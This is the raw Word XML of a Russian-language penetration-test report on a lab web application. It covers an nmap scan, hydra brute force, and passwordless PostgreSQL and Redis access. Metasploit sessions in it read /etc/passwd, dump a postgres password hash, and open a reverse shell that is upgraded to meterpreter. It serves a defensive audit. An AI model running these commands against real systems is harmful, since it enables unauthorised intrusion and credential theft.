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3C5381">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Отчет о проведенном аудите (пентесте) приложения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3C5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-1377701823"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="00CD1799" w:rsidRDefault="003C5381">
          <w:pPr>
            <w:pStyle w:val="af7"/>
            <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
            <w:contextualSpacing/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:r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:rsidR="00CD1799" w:rsidRDefault="00CD1799"/>
        <w:p w:rsidR="00CD1799" w:rsidRDefault="003C5381">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="658"/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begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc1" w:tooltip="#_Toc1" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/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Вводная часть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_Toc1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24"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="878"/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2" w:tooltip="#_Toc2" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/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Для руководства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_Toc2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24"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="878"/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3" w:tooltip="#_Toc3" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/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Для технических специали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стов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_Toc3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12"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="658"/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4" w:tooltip="#_Toc4" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/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Исследование и анализ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_Toc4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5" w:tooltip="#_Toc5" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af8"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2.1 Используемое ПО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</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:instrText>GEREF _Toc5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6" w:tooltip="#_Toc6" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af8"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2.2 Техники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_Toc6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24"/>
            <w:tabs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7" w:tooltip="#_Toc7" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af8"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2.3 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Отчет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af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по</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af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найде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нным</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af8"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t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уязвимостям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_Toc7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pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="658"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc8" w:tooltip="#_Toc8" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af8"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Заключение и рекомендации</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/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PAGEREF _Toc8 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr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5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00CD1799" w:rsidRDefault="003C5381">
          <w:pPr>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            <w:ind w:firstLine="709"/>
            <w:contextualSpacing/>
            <w:jc w:val="both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3C53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 w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRDefault="003C5381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0" w:name="_Toc1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Вводная часть</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0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Необходимо провести аудит и выявить наличие уязвимостей у веб-приложения.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3C5381">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1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1" w:name="_Toc2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Для руководства</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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аудита был выявлен ряд критических уязвимостей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, которые могут привести к модификации, недоступности или потере информации. Необходимо в кратчайшие сроки принять меры по устранению или принятию компенсирующих мер для нейтрализации выявленных уязвимостей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3C5381">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1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2" w:name="_Toc3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Для технических специалистов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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 проведения а</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">удита выявлены уязвимости с СУБД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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Данные уязвимости связаны с получением доступа, раскрытием идентификационных данных пользователей СУБД, удаленному исполнению произвольного кода на атакуемой системе.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CD1799" w:rsidRDefault="003C5381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3" w:name="_Toc4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Исследование и анализ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRDefault="003C5381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5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1 Используемое ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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стенда применялось программное обеспечение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Oracle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Развёрнута локальная сеть (192.168.0.0/24), состоящая из двух операционных систем.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ВМ с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Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, используя предоставленный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compose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yml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был поднят </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> образ и запущено приложение, которое подверглось тестированию.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 с операционной системой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> была использована для проведения тестирования (атаки). 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3C5381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6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.2 Техники</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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ходе атаки были применены следующие инструменты: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для сканиров</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ания и сбора предварительной информации, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для перебора паролей, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для атаки и пост эксплуатации уязвимостей.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Сканирование с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap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nmap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sV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4 -</w:t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0-65535 -</w:t>
      </w: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TCP</w:t>
      </w:r>
      <w:r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port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 xml:space="preserve"> &lt;атакуемый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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;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выявлены открытые порты и сервисы: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5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19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6379/tcp open  redis   Redis key-value store 7.0.12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Брутфорс (перебор паролей) показал, что пользователь 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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет доверенный статус (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) из любой сети, настройки конфигурации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пароль для подключения не потребовался. Также установив утилиту redis-tools, подключиться к БД </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно без пароля, так настройки «по умолчанию» в конфигурационном файле</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> redis.conf позволяют подключиться к БД без учетных данных.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3C5381">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709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7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.3 Отчет по найденным уязвимостям</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/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уязвимость в том, что после установки баз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и Redis все настройки оставили во умолчанию. Не были изменены конфигурационные файлы, не з</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>аданы пароли и ограничения доступа, что позволило без использования учетных данных произвести подключение к БД и осуществить дальнейшие действия по эксплуатации уязвимостей.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поиска и эксплуатации уязвимостей в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использовалось </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metasploit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1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимость, позволяющая осуществить чтение информации из файла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passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для получения информации о всех зарегистрированных пользователях. В последствии эти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>данные можно использовать для атаки на другие информационные системы. Также мы можем скачать все данны</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е, таблицы БД.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auxiliary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readfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt;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RHOSTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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RHOSTS =&gt;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auxiliary(admin/postgres/postgres_readfile) &gt; set rfile /etc/passwd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rfile =&gt; /etc/passwd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auxiliary(admin/postgres/postgres_readfile) &gt; run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Running module against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Text: 'CREATE TEMP TABLE RGdAeAmJuPCLMc (INPUT TEXT);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COPY RGdAeAmJuPCLMc FROM '/etc/passwd';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SELECT * FROM RGdAeAmJuPCLMc'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</w:rPr>
        <w:t>захват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баннеров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С помощью данной уязвимости можно осуществить запрос к БД.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auxiliary(admin/postgres/postgres_sql) &gt; set rhosts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rhosts =&gt;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auxiliary(admin/postgres/postgres_sql) &gt; set password ""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=&gt;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auxiliary(admin/postgres/postgres_sql) &gt; run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Running module against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Query Text: 'select version()'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==============================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version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-------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PostgreSQL 9.6.15 on x86_64-pc-linux-musl, compiled by gcc (Alpine 8.3.0) 8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.0, 64-bit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[*] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Auxiliary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execution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completed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Уязвимость, предоставляющая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> пароля, для последующей его расшифровки. Расшифровав хэши паролей, можно применить их для последующих атак.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sf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:r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scanner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postgres</w:t>
      </w:r>
      <w:r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hashdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set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rhosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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rhosts =&gt;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auxiliary(scanner/postgres/postgres_hashdump) &gt; run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Query appears to have run successfully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Postgres Server Hashes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======================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Username  Hash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postgres  md5e8a48653851e28c69d0506508fb27fc5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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*] Scanned 1 of 1 hosts (100% complete)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Auxiliary module execution completed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Уязвимость используется для выполнения произвольных команд на атакуемой системе. После получения сессионного доступа можно изменять, копировать, удалять данные, осуществит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ь получение привилегированного доступа (повышение привилегий) в системе, осуществить закрепление (постэксплуатация) в системе и оставить бэкдоры.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>Эксплуатация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уязвимости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set rhosts 192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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rhosts =&gt;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set password ""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password =&gt;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set lhost 192.168.0.20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lhost =&gt; 192.168.0.20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run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[*] Started reverse TCP handler on 192.168.0.20:4444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192.168.0.13:5432 - 192.168.0.13:5432 - PostgreSQL 9.6.15 on x86_64-pc-linux-musl, compiled by gcc (Alpine 8.3.0) 8.3.0, 64-bi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192.168.0.13:5432 - Exploiting...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dropped successfully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created successfully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cop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ied successfully(valid syntax/command)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[+] 192.168.0.13:5432 - 192.168.0.13:5432 - 3LvolMSL8hZS dropped successfully(Cleaned)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192.168.0.13:5432 - Exploit Succeeded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Command shell session 1 opened (192.168.0.20:4444 -&gt; 192.168.0.13:45826) at 2023-07-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>27 04:16:01 -0400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Создание сессий для удаленного управления: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sessions -u 1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Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]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Upgrading session ID: 1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Starting exploit/multi/handler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[*] Started reverse TCP handler on 192.168.0.20:4433 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Sending stage (1017704 bytes) to 192.168.0.13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Meterpreter session 2 opened (192.168.0.20:4433 -&gt; 192.168.0.13:51716) at 2023-07-27 04:19:19 -0400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Command s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tager progress: 100.00% (773/773 bytes)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msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) &gt; sessions 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRPr="00544DF0" w:rsidRDefault="003C5381">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/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[*] Starting interaction with 2...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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD1799" w:rsidRPr="00544DF0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44DF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для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DF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>поиска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DF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и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DF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>эксплуатации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DF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>уязвимостей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44DF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
